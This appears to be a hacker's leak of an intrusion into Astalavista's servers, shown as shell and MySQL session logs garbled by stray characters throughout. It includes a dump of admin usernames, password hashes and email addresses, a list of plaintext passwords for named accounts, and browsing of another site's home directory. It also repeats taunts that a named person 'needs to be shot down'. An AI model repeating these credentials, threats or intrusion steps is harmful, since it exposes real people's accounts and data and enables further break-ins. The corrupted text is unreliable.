1 V: ~' M* @1 e. R <description>All availably Exploits.</description> Q) a8 t3 R6 j- s& C k! \
<language>en-us</language>
8 p3 x, M6 t, V6 V% K$ V6 x3 V <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
4 T3 n: a& Z* S% d1 d <docs>http://blogs.law.harvard.edu/tech/rss</docs>
! ]+ M3 \$ H: |/ s) I' s# l& M <generator>Astalavista.com</generator>
7 t$ ~, F+ f2 o: C3 } <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
, a8 i; u8 F( w9 [! v; c </channel>" U" r* k' _, U) R7 @
</rss>’;, q! n; R) o, p& _/ l2 A% e
P9 q5 E& u. `* i! f# Q; b# z if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {/ ^' r9 q+ l& b ^
unlink (FULLPATH . ‘/feed/exploits.xml’);
3 |" H, c! ?0 N) C6 E }
7 k# E" ?5 D! x) [9 s! a1 G! ^1 A: @) J8 ], ?
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);9 i5 }/ `6 M5 Y1 P9 \ }0 `
[snip]
" I8 i/ c# B6 K4 M6 S
1 N) c3 H% N8 Z6 ish-3.2$ cat exploits.sh0 B$ y( ^2 T+ Z2 i, _ y
#!/bin/sh
- e3 D4 @6 L8 u% o4 u8 D$ N" E' U) o5 K0 d) T. ^/ C P& P
###########################################################( B1 G2 X2 E2 `0 [0 F/ F
# #
- }8 U3 J$ {5 z! F. t: E, N8 m# Title: milw0rm exploits adder #7 x4 J1 ]" ]$ G& Q
# Description: Add all milw0rm exploits to the #3 ?) I) j( l1 Y1 H) t: J; a% f* Q
# Astalavista.com database ## o3 Y" Y/ d2 n, ^, g) Q
# #
. k! c* l( k8 p H5 T& o# Company: Astalavista Group #
3 K* d* w" A7 {( p0 V# Author: Paulo M. Santos #
# f& b+ w! y- w6 |9 m# E-Mail: 链接标记paulo.santos@astalavista.ch #3 P+ E$ h7 j& Y( f4 } I
# #% e# T/ _5 n* K- J+ n
###########################################################
( ~7 g6 @' }/ q1 n- i- [' o6 L7 {$ J% _8 B+ m. U
# path
; G: \% M# q/ ]9 A* i8 p9 `this_path=/home/com/public_html/modifications/cronjobs9 P) M8 g- ], b/ M% K( @$ D
+ ^/ v+ b) y4 N: j+ u2 m7 A. E$ y
# change directory2 Z& V: Q( V8 x4 N# \0 C$ a
cd $this_path/ n# I( F' X7 z' Y, l6 Z# I" }" \
cd tmp/
2 S( Q2 k ?: M3 M6 Z1 P! Y
. u- B% _) Y4 H% W5 q8 b# delete files
' f# d7 y) k( H* Mrm -rf milw0rm.tar.* &
4 l ?" v9 ]; b4 H: Brm -rf milw0rm/ &
! n) l4 r, K: i0 q: N3 P/ _# w* U, x: P8 b; \, `. J* M
# wget milw0rm paket
( W. b- _5 M8 H" R9 i# }wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
9 ?4 G( k' J5 R8 v& C7 \6 }. d9 I8 P) P' b2 s9 \- j
# extract milw0rm paket
5 Q0 B& H# ]. X, [* {) r5 I3 n% |tar -xvf milw0rm.tar.bz2
+ V( u( z( ]5 I) }7 F# I x8 s
4 F' i, X* w/ v0 g: ^7 F# change owner+ ?4 i; o+ l4 ]
chown -R com .
8 E% u" y- a) G/ [chgrp -R com ." B; [+ H/ f$ C: W: h. ?( p* {
' o5 l6 M. S( s( l* w9 {. f: Q# execute php script
1 e* o, [) ]7 O- ccd $this_path; _' [% K, i/ t# X
php -q exploits.php' ?' o2 v! ]% i! @7 @
9 M3 ^) |0 h7 y- D
# delete files
! r) s1 j4 Z, ^1 \5 _: u* Mrm -rf tmp/milw0rm.tar.*7 M' \$ Z: P' F" E0 l @
rm -rf tmp/milw0rm/* n& s5 Z- @9 z* }/ A; A# d. n
2 v' h. V x$ f, g6 y& L3 { H. Vsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
0 |% ~4 p3 J4 IPaulo M. Santos needs to be shot down.' W% {. d0 i. X) z8 S
5 u, T7 V* }4 x7 ^; ?, n: Emysql -u contrexxuser2 -p( f P+ w7 W$ j! U5 n& V0 R
Enter password:
( F0 s9 M& K6 K+ r% B H& xWelcome to the MySQL monitor. Commands end with ; or \g.
% B' [+ C a* ?& w* y5 GYour MySQL connection id is 261694* W; L* c$ @4 d0 S) m
Server version: 5.0.45-community-log MySQL Community Edition (GPL); i* B' R; s0 M# r
: M/ u/ j& o! L0 B- ?. T" sType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ \/ l4 l5 s+ M( ?
( S j1 C% ~, ]( p' C$ W
mysql> show databases;
* D% v( z0 G& f" e& u+——————–+4 Q4 c) U( T c
| Database |. e$ M* B2 x$ b% \9 @
+——————–+
6 H4 v1 k2 t9 ]. g( v2 || information_schema |
6 P' k7 [/ w6 t9 [| com_contrexx2 |
5 a b2 D. ?6 F" ], I" _( w| com_contrexx2_live |
1 g+ @) \1 X. W% ?' j| test |
1 m% q4 [! v' i' e+——————–+
! z% v# F$ B! {3 N6 ^! r1 y4 rows in set (0.00 sec)
1 C, @/ v( W6 X5 @, |( A) \
: ~" Z( u0 ]( w% e; lmysql> use com_contrexx2_live* Z! ~) ~! \# i% c# K- X
Database changed
: S+ J% ?. {' A, ~( Xmysql> show tables;" G& r" |5 F# h7 }# ~1 b
+————————————————–+3 Y. n' ]5 g7 j4 V# f2 p2 y0 E
| Tables_in_com_contrexx2_live |
. v( i$ o3 |. A1 U( u" t+ [- {8 N+————————————————–+$ f. A6 E5 m) P! a# z
| cc_banner_counter |: W$ l$ O% g+ w! L: I" c, j( v
| cc_search_counter |
- H5 U! ?: m% L" Z! E# P8 Q' y; @& L| contrexx_access_group_dynamic_ids |! j. V. H3 X/ m/ X
| contrexx_access_group_static_ids |
9 r) P- V5 W; C' r- t| contrexx_access_rel_user_group |
+ Z7 b" L4 X$ g' i+ a" Z" S8 G| contrexx_access_settings |* W! F7 m- Q5 Z, k4 c Y6 G4 S
| contrexx_access_user_attribute |1 D6 v$ d8 r2 v% R% i; ~
| contrexx_access_user_attribute_name |
9 y: U& V+ @. ?# {5 D2 U. r" ]| contrexx_access_user_attribute_value |
' C r: A$ O) T X# \% A8 i- `$ c| contrexx_access_user_core_attribute |
" ?5 ~9 |# v- b7 h* {| contrexx_access_user_groups |
9 H4 L3 j4 ~ J- f7 t| contrexx_access_user_mail |
. ?8 H1 ?8 f Q( f| contrexx_access_user_profile |
7 F0 I1 u) c! W0 Y# e| contrexx_access_user_title |" K k# t0 |" Z2 l7 G8 `7 r6 K
| contrexx_access_user_validity |4 T. U" B2 L5 Z9 A3 o5 C; [
| contrexx_access_users |) x F, \, q3 a5 X, E( b! |
| contrexx_backend_areas |
0 `" c3 n& g$ L' ~: g| contrexx_backups |
8 |6 Z; v0 b- [+ ^7 Y* z+ ^1 D| contrexx_content |8 x3 g3 W4 u. R& |* L0 G
| contrexx_content_history |" C9 Y; I) R# Y5 [( R
| contrexx_content_logfile |
0 V8 o8 ]5 \- q+ E# D; w3 _| contrexx_content_navigation |
5 v6 F8 b# ~! y+ m/ a. d: ]6 Y5 j5 E| contrexx_content_navigation_history |
" n9 m: @* W+ f! \. N8 ]2 j| contrexx_ids |+ H2 R) [* A/ q: {5 W8 J
| contrexx_languages |
. @; K3 @3 \. I+ K: c5 Q| contrexx_lib_country |# z7 i' l' n, F9 q2 A, i
| contrexx_log |$ ?# h" d' w7 M2 Z0 V
| contrexx_module_alias_source |6 O0 Y# }7 Q( p6 M8 D2 T
| contrexx_module_alias_target |4 Z d: d5 `9 k% j
| contrexx_module_block_blocks |" O. K- u9 G6 j& a! z# }. ^
| contrexx_module_block_rel_lang |
& r4 ^3 I0 i" Y| contrexx_module_block_rel_pages |% Z: ^4 S% W" _3 q* T g" | d8 i
| contrexx_module_block_settings |
6 n# P7 j- b+ m* r4 K( l| contrexx_module_blog_categories |
9 |2 E% J3 A/ R| contrexx_module_blog_comments |
^ R$ o o; ^, v' _: g( Q+ g" ?7 w| contrexx_module_blog_message_to_category |
6 j4 p1 P E" k, g! W: W# p) ^8 K| contrexx_module_blog_messages |/ O2 N" D# T! A# U% P0 o
| contrexx_module_blog_messages_lang |5 m8 m) W7 A0 J9 V
| contrexx_module_blog_networks |( @' X1 q8 o' u+ k. B9 A( y
| contrexx_module_blog_networks_lang |; N2 f+ r2 h: a2 h2 h0 M9 c# O
| contrexx_module_blog_settings |6 C6 k. s* s n; I& \
| contrexx_module_blog_votes |) ~! P9 K; X2 M8 a ?. x2 A |
| contrexx_module_calendar |
3 `" S/ N% }" a, S$ @ V+ ~, b0 D" Q| contrexx_module_calendar_access |3 \9 a9 O1 j. j" z
| contrexx_module_calendar_categories |; t: b8 B, c/ H! C3 h# H4 W
| contrexx_module_calendar_form_data |
3 i4 s* C o+ S* K2 t| contrexx_module_calendar_form_fields |: G# |/ K! S( }- o; r! z
| contrexx_module_calendar_registrations |
1 [* c9 t& L) O- d| contrexx_module_calendar_settings |
2 C& k- Y* M) t+ O. ~| contrexx_module_calendar_style |' Z: [* A$ R1 A* s- ?: B
| contrexx_module_contact_form |0 m/ x L# f. W
| contrexx_module_contact_form_data |3 L8 l% C7 X% M. T) R; [
| contrexx_module_contact_form_field |8 V$ i! |# N8 v$ z8 @: c
| contrexx_module_contact_settings |
8 v% e- S$ g3 s7 c| contrexx_module_data_categories |0 v* [5 P$ ^1 ~7 \8 `
| contrexx_module_data_message_to_category |
1 M- \ h6 a5 R| contrexx_module_data_messages |0 k) n: n" F1 J6 v. A$ I$ G+ F
| contrexx_module_data_messages_lang |
& a/ Y+ m! q1 o& {1 }4 ]: m) [7 [| contrexx_module_data_placeholders |! x- U+ e; b7 p! U
| contrexx_module_data_settings |
6 b3 k9 E" M" `| contrexx_module_directory_access |
5 ?( W& b$ x0 R# T1 z| contrexx_module_directory_categories |" l3 Z- k4 e' ^" s6 _
| contrexx_module_directory_dir | Z* H% h" ]" v) Q: R* H9 v3 ^
| contrexx_module_directory_inputfields |# h! } c1 J+ z0 m6 a1 v* x
| contrexx_module_directory_levels |
% b0 p& J) ~! R, J| contrexx_module_directory_mail | w ~ P5 ]- _6 ~9 v/ y
| contrexx_module_directory_rel_dir_cat |
3 O- a. e% I) U9 L: d8 Y| contrexx_module_directory_rel_dir_level |
. C C2 g! u& C| contrexx_module_directory_settings |6 _! a( y( u3 W8 o& w, C" a7 ~
| contrexx_module_directory_settings_google |: B9 ^: ? b0 z
| contrexx_module_directory_vote |5 @1 Y/ y! n o, l: ]0 Q" ]
| contrexx_module_docsys |
Q2 O$ I8 m, A" o2 C( c| contrexx_module_docsys_categories |
" D8 c& q! j4 L+ ?| contrexx_module_egov_configuration |5 u" N( q5 G2 u
| contrexx_module_egov_orders |9 e. b8 d [( \$ h6 j5 T* e0 b
| contrexx_module_egov_product_calendar |
2 Y' x2 l- z0 L6 F7 U3 k: P| contrexx_module_egov_product_fields |7 B4 J7 q; R4 z0 _& w
| contrexx_module_egov_products |4 u$ m- p) H5 x, h: ^& c
| contrexx_module_egov_settings |
7 i) w0 m6 m5 u& ~( R/ o; P8 u| contrexx_module_exploits |/ G" m$ i4 P9 V6 X7 C+ @. V c
| contrexx_module_exploits_categories |
. g/ C& a' X2 A2 Q| contrexx_module_feed_category |
9 z- ~' ]# X3 h, U6 x| contrexx_module_feed_news |
& z/ k8 v% L, E& Y+ m3 z| contrexx_module_feed_newsml_association |
% I$ u: K# i' G| contrexx_module_feed_newsml_categories |
- z3 j5 u) E* Q! @| contrexx_module_feed_newsml_documents |7 L4 n5 |" X8 T- Q$ k. r
| contrexx_module_feed_newsml_providers |- _" s0 K% z4 V7 R- U+ v) M1 {/ X
| contrexx_module_forum_access |
' ^* ^1 y6 B4 ]* T" L1 p| contrexx_module_forum_categories |) |" l d2 |" {2 i4 K9 _
| contrexx_module_forum_categories_lang |. V v t* C- m6 e
| contrexx_module_forum_notification |
% n3 G$ o4 w, H) K& l. G| contrexx_module_forum_postings |* J0 q* H$ A. w
| contrexx_module_forum_rating |
( K m- u+ Q1 j) i4 X5 _2 P" E| contrexx_module_forum_settings |
- O* x, w- E& p# f# C( Q9 M| contrexx_module_forum_statistics |9 u8 G& N6 |) M. ]$ U
| contrexx_module_gallery_categories |! s, ^/ k# K' O! q( |
| contrexx_module_gallery_comments |: [1 z, ^8 P4 E6 Z$ k
| contrexx_module_gallery_language |2 W6 Y `3 D7 F& `2 l3 k% n. k z
| contrexx_module_gallery_language_pics |+ k$ ]' a6 F6 j8 \+ L
| contrexx_module_gallery_pictures |. ~! [8 `3 F2 Z' w
| contrexx_module_gallery_settings |# ?' e4 w! }+ i4 J) ?! z5 k; j
| contrexx_module_gallery_votes |
( q' w: w6 ?; R' d, O( H| contrexx_module_guestbook |7 S2 s" p& |: q5 w5 W* M
| contrexx_module_guestbook_settings |/ g* K# M4 g3 `' C7 z4 B7 v2 [
| contrexx_module_livecam |2 o4 t. C& R( ~, C
| contrexx_module_livecam_settings |% y7 x/ a3 c7 T6 z
| contrexx_module_market |
- g" v8 N; t2 C: M9 \2 j4 E; }| contrexx_module_market_access |. `2 h |- \) J/ e6 }- i3 W
| contrexx_module_market_categories |2 ?% i# M& q2 S; i: {6 e
| contrexx_module_market_mail |$ P; W' T4 }- {- R* c
| contrexx_module_market_paypal |; D# ?: V8 A% @$ N- B: ?
| contrexx_module_market_settings |
! r& l. I+ w( ~| contrexx_module_market_spez_fields |
/ i2 t1 ]) E0 H| contrexx_module_mediadir_access |& A8 k( c, A7 G+ W8 P0 f
| contrexx_module_mediadir_categories |- A5 U: O" z! F/ r
| contrexx_module_mediadir_comments |
* M6 k* J& m( }/ o3 l5 O| contrexx_module_mediadir_dir |2 h7 e+ T5 O; ^ B \8 m( k! D
| contrexx_module_mediadir_inputfields | N" U F. X0 E9 [
| contrexx_module_mediadir_levels |; v( x! P1 {5 j. X
| contrexx_module_mediadir_mail |$ \7 B+ u: _1 q: C3 g$ O4 ]
| contrexx_module_mediadir_rel_dir_cat |/ x- g# ~/ E; e( r; y3 U
| contrexx_module_mediadir_rel_dir_level |' t) ?% C3 b( H6 e+ D" D: P' x; a* v
| contrexx_module_mediadir_reports |
3 `* G1 j; u# q( j, H| contrexx_module_mediadir_settings |3 K2 l; m4 q" T2 e5 I
| contrexx_module_mediadir_settings_google |
! m5 O5 z; C2 J5 S| contrexx_module_mediadir_vote |
) l5 W3 N g6 z# `| contrexx_module_memberdir_directories |
7 I3 ]7 y, j% \8 a: y( || contrexx_module_memberdir_name | q+ V% j6 _0 {, n1 q; g5 f1 K
| contrexx_module_memberdir_settings |
$ C# ^- P$ L( R6 S- r| contrexx_module_memberdir_values | v3 b+ g$ ^# `2 a' g: A
| contrexx_module_nettools_allowed_groups |
/ X# K* t9 c" D| contrexx_module_nettools_settings |/ Q# p& a3 R: P( E) a6 `& P
| contrexx_module_news |
4 [: X) Z8 t) |" z7 Q( P2 G| contrexx_module_news_access |
. r, O! r( v8 ]2 S| contrexx_module_news_categories |
. }% k* b' D. A! s" A9 E4 _| contrexx_module_news_settings |
$ J! |# j0 v% P9 j4 [( E6 A* _+ t- z| contrexx_module_news_teaser_frame |3 w' w* s5 i5 N" h. W
| contrexx_module_news_teaser_frame_templates |
l5 ^/ w" o8 `' L| contrexx_module_news_ticker |
5 A: \* s: W& i| contrexx_module_newsletter |
! B, b8 S e1 T5 {6 S* E: L| contrexx_module_newsletter_attachment |, ~$ R7 w# `- X
| contrexx_module_newsletter_category |
1 t9 _4 W: ~% `) s. c K5 a* D| contrexx_module_newsletter_confirm_mail |9 ^1 C x/ X+ e* K. ^7 v9 r. }- l' Y
| contrexx_module_newsletter_rel_cat_news |; \, o; k: r5 |2 l
| contrexx_module_newsletter_rel_user_cat |
4 t' u2 y, a& [2 h8 k% k| contrexx_module_newsletter_settings |
* c# M+ ^$ O) P" T" |( b1 o2 d7 w| contrexx_module_newsletter_template |
R- F. Q) ?* W: v7 m( r: \| contrexx_module_newsletter_tmp_sending |3 e; [' g7 i, a& M A
| contrexx_module_newsletter_user |! ]" {% ^2 }% ~* G, ~
| contrexx_module_newsletter_user_title |
3 G- R# `1 [7 v9 R" |3 u* s' K| contrexx_module_onlinetools_defaultports |
1 v$ r# z8 Y( B" N3 q" {| contrexx_module_onlinetools_defaultports_back |! f$ H, @6 }9 b$ i) t
| contrexx_module_onlinetools_geolitecity_blocks |6 s( F2 f6 T* ]' Z R
| contrexx_module_onlinetools_geolitecity_country |9 |& x8 ~" H7 @% r/ K; F7 E6 `- {
| contrexx_module_onlinetools_geolitecity_location |4 x5 @$ F6 W4 T, G: A8 u0 _2 w$ f
| contrexx_module_podcast_category |
9 p: k' I; o. o. s5 s| contrexx_module_podcast_medium |5 m9 A3 F4 W/ N# o! o
| contrexx_module_podcast_rel_category_lang |8 \% M) r6 C7 H- C" [
| contrexx_module_podcast_rel_medium_category |
# N' ?$ M1 S0 C5 w& l! }| contrexx_module_podcast_settings |' t; d1 h2 G0 ?7 _0 g, T& K
| contrexx_module_podcast_template |2 ]7 ?% S& O) S
| contrexx_module_proxydb |' ]- z2 e4 {; X
| contrexx_module_recommend |# x5 `: _4 D: r* J' G. H
| contrexx_module_repository |( `9 c- V5 N1 ^
| contrexx_module_securitynews_cats |
% J- a+ K* [- _/ v, m: C| contrexx_module_securitynews_feeds |7 O3 }# S' s) i u; Z$ o+ m f
| contrexx_module_securitynews_news |
( g& h9 \" w$ a) X# t: E: _! o1 @| contrexx_module_shop_categories |# c$ h! g, N5 B
| contrexx_module_shop_config |8 Z& x! ]9 Q/ F2 y8 j. V0 k: @
| contrexx_module_shop_countries |
9 R/ ?" Y8 A# ]8 F6 x| contrexx_module_shop_currencies |" ~+ O+ H/ l4 g1 ~9 _- O
| contrexx_module_shop_customers |
4 d4 u& o8 u: Q' s) P! g4 O) L| contrexx_module_shop_importimg | U8 V: U* Z+ `
| contrexx_module_shop_lsv |
6 t8 r, S$ _- n Z) H! [" z$ R| contrexx_module_shop_mail |
2 F/ ^: c7 H, a/ T* x! H2 E% ^| contrexx_module_shop_mail_content |& v% C! o- A7 f: ]
| contrexx_module_shop_manufacturer |
0 f' W. w$ l& k0 y| contrexx_module_shop_order_items |! G5 W1 _/ o0 C/ K, m: f& D. Q
| contrexx_module_shop_order_items_attributes |
# h; c! ^# P1 T6 @) u6 @) r. z| contrexx_module_shop_orders |- V+ k5 R$ \& ~
| contrexx_module_shop_payment |+ O; G$ f# s2 \
| contrexx_module_shop_payment_processors |& F2 Z4 r9 o7 z
| contrexx_module_shop_pricelists |5 [. H* R3 N L
| contrexx_module_shop_products |2 E4 z* t# i0 K9 I) g9 k
| contrexx_module_shop_products_attributes |4 ^$ ~) v/ M6 ?. M, h
| contrexx_module_shop_products_attributes_name |# J/ p) o8 e6 C( O6 T1 [
| contrexx_module_shop_products_attributes_value |
0 {* z% ?$ m9 j; y, B: l& Z, i| contrexx_module_shop_products_downloads |; n9 Y& S$ a3 p, g0 D* ?# @
| contrexx_module_shop_rel_countries |
! |" i- R, {' C6 z6 h| contrexx_module_shop_rel_payment |
% p i. @4 ^, f4 @| contrexx_module_shop_rel_shipment |7 P' @! }) |# X! O4 L, [2 I
| contrexx_module_shop_shipment_cost |" H, G" V: z( i, {% V
| contrexx_module_shop_shipper |, s! D" ]& t2 w0 ?- f
| contrexx_module_shop_vat |5 ?4 g1 q: w) y4 C! H
| contrexx_module_shop_zones |
: U: H0 X! l6 L* z: E ?: i| contrexx_module_u2u_address_list |
. p/ z/ ~- V# o' w| contrexx_module_u2u_message_log |" ~; v! p& F H$ n3 v/ S& B
| contrexx_module_u2u_sent_messages |2 L# ^: D* b) C9 }# q, L
| contrexx_module_u2u_settings |: R! s2 L6 w& `% N
| contrexx_module_u2u_user_log |$ `4 L5 \ I# E+ v- W. `$ s7 n
| contrexx_modules |$ k, w# O6 V5 m0 T* _+ x
| contrexx_sessions |
7 H3 q" d, h$ r0 Z0 M& Z| contrexx_settings |
6 a! B" m2 P" ]| contrexx_settings_smtp |( E5 ~+ @5 M( w) c; U9 [
| contrexx_skins |
9 u4 K; ^3 ? c| contrexx_stats_browser |; r+ O/ d5 |4 T( g
| contrexx_stats_colourdepth |& M& S- i+ q0 r8 N0 x; Y4 l, x
| contrexx_stats_config |, M) w. W: W) G0 o5 g) w7 |2 r# [
| contrexx_stats_country |- V. U) H7 \' O0 Y; P
| contrexx_stats_hostname |- y% n6 L: U e5 |& A
| contrexx_stats_javascript |2 O7 {$ B7 I9 y" A
| contrexx_stats_operatingsystem |/ p- W( h/ j G& L( `
| contrexx_stats_referer |: l, b. V, [" N. n
| contrexx_stats_requests |8 l8 b. @/ X6 P% G/ H
| contrexx_stats_requests_summary |
- @6 Y1 ~/ M. w* e# h| contrexx_stats_screenresolution |9 n; {9 E r' s4 f" @1 y1 o. x
| contrexx_stats_search |% W" o& }& ]4 p( D+ i. Q2 J
| contrexx_stats_spiders |
3 Z( S" X4 w. c; M! Q: P| contrexx_stats_spiders_summary |+ U p9 _, F9 o; G) M, i; T3 W$ h
| contrexx_stats_visitors |6 w, Q+ n3 S9 c$ h
| contrexx_stats_visitors_summary |$ V) j) s' X i
| contrexx_voting_additionaldata |4 [( E3 \8 i% j* Q
| contrexx_voting_email |
$ j L% r" E4 A) _! o3 ~. a| contrexx_voting_rel_email_system |
! ?5 V$ G+ p- M! A" z| contrexx_voting_results |$ U0 G' D, t+ z A9 d) c. N! H
| contrexx_voting_system |
! ^4 a* J$ q( z9 }3 C| foo |; r: m6 Y6 b- H7 U7 i
+————————————————–+
$ i+ h( w* D1 S$ Q, h2 }, G227 rows in set (0.01 sec)1 E8 y2 J) n& K3 L7 ?5 v
6 [" w' ?8 i9 q6 Q/ s6 _) S
mysql> select count(*) as skids from contrexx_access_users;$ x5 i( D$ C o2 P
+——-+
4 S9 d' z1 Z8 j4 T3 @| skids |
& x* V/ e" r5 ?. h+——-+
; g5 N; ?3 ?2 U F/ }| 53699 |9 J, \4 u, E% D4 ?
+——-+
7 t, C; W- I& w9 \1 row in set (0.00 sec)
, R( W; C6 g3 P" L. `' T1 c7 c) r" N, ~% Q0 ]1 j$ M
mysql> describe contrexx_access_users;
9 c, b+ H6 x% e/ e6 } P. Y% ]+——————+——————————————+——+—–+————–+—————-+
/ c9 m, M2 e# _. T" t$ W( W3 C5 S| Field | Type | Null | Key | Default | Extra |9 M I0 Z4 T. y! d1 o8 k. U. N
+——————+——————————————+——+—–+————–+—————-+( k* s" E: A8 D$ _5 @
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
7 n2 X9 V- A. {% w: W! I| is_admin | tinyint(1) unsigned | NO | | 0 | |
: _) ]: x/ \8 Z! ~ d& E5 b% g+ P3 o0 I| username | varchar(40) | YES | MUL | NULL | |; _ k# t- F, a
| password | varchar(32) | YES | | NULL | |) e+ N; |- l$ T8 Y+ x' e
| regdate | int(14) unsigned | NO | | 0 | |
/ Y- Z8 y1 g4 [$ d1 P) U% K| expiration | int(14) unsigned | NO | | 0 | |, z% v9 k/ E0 y R- [+ O
| validity | int(10) unsigned | NO | | 0 | |
, H9 p; O% Q @4 w! P* G| last_auth | int(14) unsigned | NO | | 0 | |3 J, [! U5 K# V+ g& @
| last_activity | int(14) unsigned | NO | | 0 | |
' i# A9 C7 W% i7 u: e| email | varchar(255) | YES | | NULL | |/ ]4 w8 s P0 n1 [: G8 W
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
6 d. x( [- j/ G: [| frontend_lang_id | int(2) unsigned | NO | | 0 | |
" a& Z7 S* t4 g Q8 f| backend_lang_id | int(2) unsigned | NO | | 0 | | ^" v2 _1 U# Z: Z4 a5 q9 V: }
| active | tinyint(1) | NO | | 0 | |
3 S, h0 W, s- S/ Z0 V| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
- R* @2 I; K) b& i& L4 P| restore_key | varchar(32) | NO | | | |. n2 Z( `9 X+ ^$ E
| restore_key_time | int(14) unsigned | NO | | 0 | |
4 _1 K4 X! h) t2 x3 {: j( E4 h| u2u_active | enum(’0′,’1′) | NO | | 1 | |
; L5 ~+ a* @$ }8 l9 N! z7 u; A+——————+——————————————+——+—–+————–+—————-+
( Z3 p: \9 N. V18 rows in set (0.00 sec)& Y1 c; j) V! g& Y
# V0 f5 ?* N# L7 _
mysql> select username,password,email from contrexx_access_users where is_admin = 1;9 t( C5 p! b; v' y8 r+ j
+————+———————————-+—————————–+
* q% d, f# B1 x& _7 w1 ?4 m) d% W+ K| username | password | email |. j$ {; m* q( @$ i4 J
+————+———————————-+—————————–+
' F5 l7 ?5 K$ o u8 {( ]5 O& U( _| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
3 n6 \& b( i6 I- h, n/ V| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
8 U, a/ K6 e! x' x9 h6 K| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
" e+ G1 ?% r2 @% i/ p B2 O8 P| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |3 j- c# W- d' B. l1 \
+————+———————————-+—————————–+
/ h) |0 f1 U+ u- t1 M ?4 rows in set (0.04 sec)0 T1 O2 ~" q2 n+ J. {/ H
6 a+ }7 a! ^1 I+ T4 S( r# O
mysql> exit;( N) M/ v. C8 S
Bye# x0 g+ S; i; S
! D* C0 M' F8 f8 w. Z3 X( h3 c- q[~] There you go, your “team of security and IT professionals” is a joke.$ K' k# ?8 ~0 a
; N t4 l O- e% S! T P2 T6 A
+——————————+
G. {3 I M4 P% j* V/ Esystem:f82BN3+_*
8 \ B6 G n# X3 K qBe1er0ph0r:belerophor4astacom
0 s/ a* e# w; U& f7 F* m/ Iprozac:asta4cms!
# V$ n, A# j" ?0 d9 acommander:mpbdaagf6m/ p, A8 W+ }7 Q8 L0 m0 a. {
sykadul:ak29eral
! U. s- U5 o4 Q3 |3 ~3 a+——————————+
% j2 g9 b! j3 V8 ?; E" o+ q4 I8 `1 @9 E X8 ^ C
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)5 P8 q( P, K' u' o% t- G
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.# Z8 Q/ L. y- q- [/ o4 q. W
8 T* n6 K1 W8 e) X- b1 u[~] Lets move to astalavista.net now,+ i/ g+ d0 u$ z" X+ V4 F b* [* T
5 q* Y" G& g; Q, @From <链接标记[url]https://www.astalavista.net/[/url]>:
. v6 _3 w' E0 |* D( b! q& O>> Everyone knows that the best defense is a good offense. A- G# H3 c$ b! D9 j" T3 o0 F
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.) g8 v9 h! T2 L5 C% W9 \
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
$ q- ?+ ~ N+ M5 _4 i9 V$ Q>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”3 \% F( y+ k F# g& _
# q5 V* F! o% r2 k7 x
>> Go ahead, try and hack our server . in a completely legal way!6 ~' U' `- ]) b
>> Learn by doing: We offer our members tricky tasks and challenges on an
0 A4 S1 w n0 f* X3 g7 M>> ongoing basis so you can test your knowledge and abilities. You can also
8 G7 I" U5 a) [+ e+ d) e>> demonstrate what you.ve mastered by taking part in regular hacker contests6 }$ Q* |: p; Y n2 O6 I
>> and war games. S8 [& w! R8 B1 q( P8 m. ~, E0 W
! a/ r9 Z: Z- K0 w7 @! n
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
+ g3 c1 S( ^& e% l3 p2 I: O6 w p6 @
[-] Tricky task: Find home dir of astalavista.net+ o, c0 v) y F
" k1 C, P5 d5 [( g) P. Z0 O( Csh-3.2$ ls -la ~astanet
- Y3 U6 G* C/ D2 q& }0 p1 ?% ktotal 48: i3 g8 Z$ Q' J+ w3 c' E
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
7 }) o) H3 Q! n& ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* g" N$ b6 _% M5 b
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth1 i1 a1 p; f* s) w* y4 i
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
7 `. D0 h$ F! n8 i7 S-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout. @" I& s7 j2 G4 }( j X( h
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile7 g% _/ Q% g# O$ ^# i
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
; v% f, y o3 u* } Ydrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
2 |" k- t0 j1 c+ f4 M# Hdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap5 K: ^9 [! c+ G7 A- ~' \# a
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
) f3 p) F8 b1 T- P" f m9 r" ilrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html% {5 K+ \; p6 R! {
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow6 `, n7 G. w0 |! \ \3 Z; K+ T& z& `
. Y3 a# Q v6 P8 Jsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
, S: a j9 x$ J7 j5 G) Z, ash-3.2$ ls -la2 w0 c: a0 {* O1 d$ n* ?
total 200
8 n8 _6 s5 ~6 [drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
# z+ I7 Q! K7 O" J- Q, k% ndrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
